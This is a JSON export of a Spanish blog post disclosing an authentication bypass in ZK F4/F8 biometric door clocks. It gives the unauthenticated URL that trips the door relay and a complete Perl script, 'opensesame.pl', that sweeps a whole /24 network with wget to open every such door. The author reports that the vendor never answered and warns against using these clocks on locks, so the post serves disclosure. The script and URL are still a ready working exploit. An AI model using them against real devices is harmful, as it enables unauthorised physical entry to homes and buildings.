{"id":731,"date":"2015-09-23T09:00:41","date_gmt":"2015-09-23T12:00:41","guid":{"rendered":"http:\/\/www.nerdadas.com.ar\/blog\/?p=731"},"modified":"2015-09-21T16:29:03","modified_gmt":"2015-09-21T19:29:03","slug":"bug-en-zk-f-biometricos","status":"publish","type":"post","link":"https:\/\/www.nerdadas.com\/blog\/bug-en-zk-f-biometricos\/","title":{"rendered":"BUG en ZK F* Biom\u00e9tricos"},"content":{"rendered":"

 <\/p>\n

Hace 3 a\u00f1os report\u00e9 este agujero a ZKSoftware<\/strong> y nunca tuve respuesta. En su momento lo testee sobre un ZK F4 y hoy en d\u00eda lo hice funcionar sobre ZK F8. Paso en limpio el bug en cuesti\u00f3n.<\/p>\n

\"Menu<\/a>
Menu Reloj<\/figcaption><\/figure>\n
\"Login<\/a>
Login ZK<\/figcaption><\/figure>\n
\"Open<\/a>
Open Dooorrrr!!!<\/figcaption><\/figure>\n

El asunto es bien bien<\/strong> sencillo. Los dispositivos ZK utilizan una interfaz web para administrar los relojes (un SDK por sockets, una api via webservice, etc, etc..). No los examin\u00e9 en profundidad pero 5 minutos<\/strong> en la aplicaci\u00f3n web me bastaron para notar que la autenticaci\u00f3n funciona solo sobre el frame del men\u00fa<\/strong> y no en el central.<\/p>\n

Con un simple test (copiar y pegar) me di cuenta que llamando directamente al link este funciona perfectamente sin validaci\u00f3n alguna. El link que prob\u00e9 fue: \u00abOpen Door\u00bb<\/strong> que activa un relee que permite abrir una puerta, entre mil funciones posibles.<\/p>\n

Hackeamos el reloj pegando en un navegador lo siguiente:\u00a0http:\/\/[ipdellectorbiom\u00e9trico]\/form\/Device?act=9<\/strong><\/p>\n

As\u00ed de sencillo y el reloj cierra el relee que abre la puerta de tu casa. Obvio, primero hay que tener acceso a la red d\u00f3nde se encuentra este dispositivo.<\/p>\n

Tan sencillo es que logr\u00e9 un script en perl que abre todas las puertas de la red una por un<\/strong>a. (Fuerza bruta, obvio). Mi consejo, no usen estos relojes para abrir cerraduras<\/strong>\u00a0y si lo hacen no los conecten a la red. (Menos que menos usar estos relojes para abrir las puertas en una carcel.<\/p>\n

[pastacode lang=\u00bbbash\u00bb message=\u00bbopensesame.pl\u00bb highlight=\u00bb\u00bb provider=\u00bbmanual\u00bb]<\/p>\n

#!\/usr\/perl\/\r\nif($ARGV[0]==\"\"){\r\n\tprint \"\\n Funciona solo con redes con mascara de 24. Como parametro la direccion \\n de red(entre comillas) sin el ultimo decimal.\\n opensesame.pl \\\"192.168.1.\\\"\\n\\n\"\r\n}else{\r\n\tfor (my $i=1; $i < = 255; $i++){\r\n\t\tsystem(\"wget --tries=1 --connect-timeout=3 http:\/\/\".$ARGV[0].$i.\"\/form\/Device?act=9\");\r\n\t}\r\n\tprint \"\\nLimpieza!\\n\";\t\r\n\tsystem(\"del Device*.*\"); #Windows\r\n}<\/code><\/code><\/pre>\n
[\/pastacode]<\/p>\n","protected":false},"excerpt":{"rendered":"
  Hace 3 a\u00f1os report\u00e9 este agujero a ZKSoftware y nunca tuve respuesta. En su momento lo testee sobre un ZK F4 y hoy en d\u00eda lo hice funcionar sobre ZK F8. Paso en limpio el bug en cuesti\u00f3n. El asunto es bien bien sencillo. Los dispositivos ZK utilizan una interfaz web para administrar los […]<\/p>\n","protected":false},"author":1,"featured_media":735,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[161,17,804],"tags":[965,952,951,958,959,964,954,953,582,961,282,210,257,960,963,950,37,962,549,949,273,869,956,955,957],"class_list":["post-731","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-seguridad","category-tecnologia","category-ti","tag-abrir","tag-biometric","tag-biometrico","tag-bug","tag-bugfix","tag-door","tag-f4","tag-f8","tag-falla","tag-fingerprint","tag-hack","tag-hacker","tag-hackers","tag-huella","tag-key","tag-lector","tag-linux","tag-lock","tag-open","tag-perl","tag-puerta","tag-seguridad","tag-software","tag-zk","tag-zksoftware"],"_links":{"self":[{"href":"https:\/\/www.nerdadas.com\/blog\/wp-json\/wp\/v2\/posts\/731","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.nerdadas.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.nerdadas.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.nerdadas.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.nerdadas.com\/blog\/wp-json\/wp\/v2\/comments?post=731"}],"version-history":[{"count":6,"href":"https:\/\/www.nerdadas.com\/blog\/wp-json\/wp\/v2\/posts\/731\/revisions"}],"predecessor-version":[{"id":741,"href":"https:\/\/www.nerdadas.com\/blog\/wp-json\/wp\/v2\/posts\/731\/revisions\/741"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.nerdadas.com\/blog\/wp-json\/wp\/v2\/media\/735"}],"wp:attachment":[{"href":"https:\/\/www.nerdadas.com\/blog\/wp-json\/wp\/v2\/media?parent=731"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.nerdadas.com\/blog\/wp-json\/wp\/v2\/categories?post=731"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.nerdadas.com\/blog\/wp-json\/wp\/v2\/tags?post=731"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}